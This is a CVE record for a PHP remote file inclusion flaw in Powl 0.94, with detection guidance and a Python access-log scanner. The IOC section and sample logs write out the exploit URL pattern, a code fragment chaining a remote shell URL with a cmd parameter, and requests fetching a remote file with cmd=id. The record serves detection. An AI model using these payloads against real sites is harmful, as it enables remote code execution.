CVE-2007-3371
published 2007-06-22

Priority: P356 · high · 7.5 (CVSS 2.0)
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P
EXPLOIT
EPSS: 71.18% (99.3th percentile)

PHP remote file inclusion vulnerability in plugins/widgets/htmledit/htmledit.php in Powl 0.94 allows remote attackers to execute arbitrary PHP code via a URL in the _POWL[installPath] parameter.

Affected (1 range)

Vendor | Product | Version range | Fixed in
powl | powl | - | -

Detection & IOCs (extracted from sources)

path: plugins/widgets/htmledit/htmledit.php
url: http://site.com/[path]/plugins/widgets/htmledit/htmledit.php?_POWL[installPath]=[Evil_Script>:]
command: $kw3 = $path."?_POWL[installPath]=".$shell."?&cmd=".$cmd
  • Detect HTTP requests targeting the vulnerable script path with the _POWL[installPath] parameter containing an external URL (RFI attempt).
  • Monitor for GET requests to htmledit.php that include a URL-like value (http:// or https://) in the _POWL[installPath] query parameter, indicating remote file inclusion exploitation.
  • The exploit appends a trailing '?' and '&cmd=' to the injected shell URL to pass OS commands; look for this double-query-string pattern in web server logs.
  • The vulnerability only affects Powl version 0.94; verify the installed version before applying detection rules to avoid false positives on patched or unrelated deployments.
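
The detection notes above, as an added example that is not part of the original record or any published rule: a Python check over web server access-log lines for htmledit.php requests whose _POWL[installPath] value is a remote URL, also flagging the trailing '?' plus cmd pattern. Combined log format is assumed; the log lines, addresses, host names and the classify/scan function names are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

SCRIPT = "plugins/widgets/htmledit/htmledit.php"  # path named in the advisory
PARAM = "_POWL[installPath]"                       # parameter named in the advisory
REMOTE = re.compile(r"^\s*https?://", re.I)        # URL-like value (http:// or https://)
REQUEST = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

# Constructed sample lines (combined log format, documentation address ranges).
SAMPLE_LOG = [
    '192.0.2.10 - - [22/Jun/2007:10:01:02 +0000] "GET /powl/index.php HTTP/1.1" 200 5120',
    '198.51.100.7 - - [22/Jun/2007:10:03:41 +0000] "GET /powl/plugins/widgets/htmledit/'
    'htmledit.php?_POWL[installPath]=http://files.example/s.txt?&cmd=id HTTP/1.1" 200 312',
    '203.0.113.5 - - [22/Jun/2007:10:04:09 +0000] "GET /powl/plugins/widgets/htmledit/'
    'htmledit.php?_POWL%5BinstallPath%5D=https%3A%2F%2Ffiles.example%2Fs.txt HTTP/1.1" 200 98',
    '192.0.2.10 - - [22/Jun/2007:10:05:30 +0000] "GET /powl/plugins/widgets/htmledit/'
    'htmledit.php?_POWL[installPath]=/var/www/powl/ HTTP/1.1" 200 2048',
]

def classify(line):
    """Return None for a non-matching line, else a dict describing the RFI indicator."""
    m = REQUEST.search(line)
    if not m:
        return None
    url = urlsplit(m.group("target"))
    if not url.path.lower().endswith(SCRIPT):
        return None
    # parse_qsl percent-decodes names and values, so _POWL%5BinstallPath%5D matches too.
    params = parse_qsl(url.query, keep_blank_values=True)
    for i, (name, value) in enumerate(params):
        if name == PARAM and REMOTE.match(value):
            # Double-query-string pattern: the injected URL ends in '?' and a
            # 'cmd' parameter follows it in the same request.
            chained = value.endswith("?") and any(n == "cmd" for n, _ in params[i + 1:])
            return {"client": line.split()[0], "remote": value, "cmd_chained": chained}
    return None

def scan(lines):
    """Return one finding per matching line, in input order."""
    return [hit for hit in map(classify, lines) if hit]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```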